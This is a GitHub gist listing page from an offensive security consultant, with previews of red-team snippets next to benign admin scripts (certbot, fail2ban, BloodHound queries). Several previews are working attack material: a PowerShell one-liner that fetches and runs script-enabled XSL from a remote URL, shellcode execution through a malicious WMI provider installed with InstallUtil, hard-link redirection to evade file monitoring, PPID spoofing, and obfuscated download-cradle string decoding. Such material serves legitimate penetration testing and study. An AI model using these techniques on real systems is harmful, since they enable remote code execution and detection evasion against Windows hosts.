Skip to content

Instantly share code, notes, and snippets.

💭
Offensive Sencha Consultant

Mariusz B. mgeeky

💭
Offensive Sencha Consultant
View GitHub Profile
@mgeeky
mgeeky / shellcodeLoader.go
Created May 13, 2020
Simple Shellcode loader implemented in Golang
View shellcodeLoader.go
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
@mgeeky
mgeeky / Update_Notes.md
Created Apr 30, 2020
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@mgeeky
mgeeky / PowerShell.txt
Created Apr 30, 2020
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
View PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
View EvilWMIProvider.cs
// Based On LocalAdmin WMI Provider by Roger Zander
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
// Adapted For Evil By @subTee
// Executes x64 ShellCode
//
// Deliver and Install dll
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
// Invoke calc for SYSTEM level calculations
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null
View PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@mgeeky
mgeeky / httprequest.cna
Last active Apr 7, 2020
Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections.
View httprequest.cna
#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#
import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active May 6, 2020
Various Powershell Download Cradles purposed as one-liners
View Download-Cradles-Oneliners.md

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@mgeeky
mgeeky / certbot-wildcard-request.sh
Last active Apr 15, 2020
Let's Encrypt certbot command for Wildcard certficate request with CSR happening over DNS
View certbot-wildcard-request.sh
#!/bin/bash
if [ $# -ne 1 ]; then
echo "Usage: ./certbot-wildcard-request.sh <domain-name>"
exit 1
fi
DOMAIN=$1
certbot certonly \
@mgeeky
mgeeky / apache-common.local
Created Apr 5, 2020
Some example fail2ban configuration
View apache-common.local
#
# This supersedes the old and incorrect datepattern regex for older Apache2 instances to make
# it working against Apache 2.4+ ones.
#
# Mariusz B. / mgeeky
#
[DEFAULT]
datepattern = \[(%%d/%%b/%%Y:%%H:%%M:%%S %%z)\]
@mgeeky
mgeeky / red-teaming-bloodhound-cypher-queries.md
Last active Mar 10, 2020
A handy list of Cypher queries that I've used during AD assessments
View red-teaming-bloodhound-cypher-queries.md
  • Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC
You can’t perform that action at this time.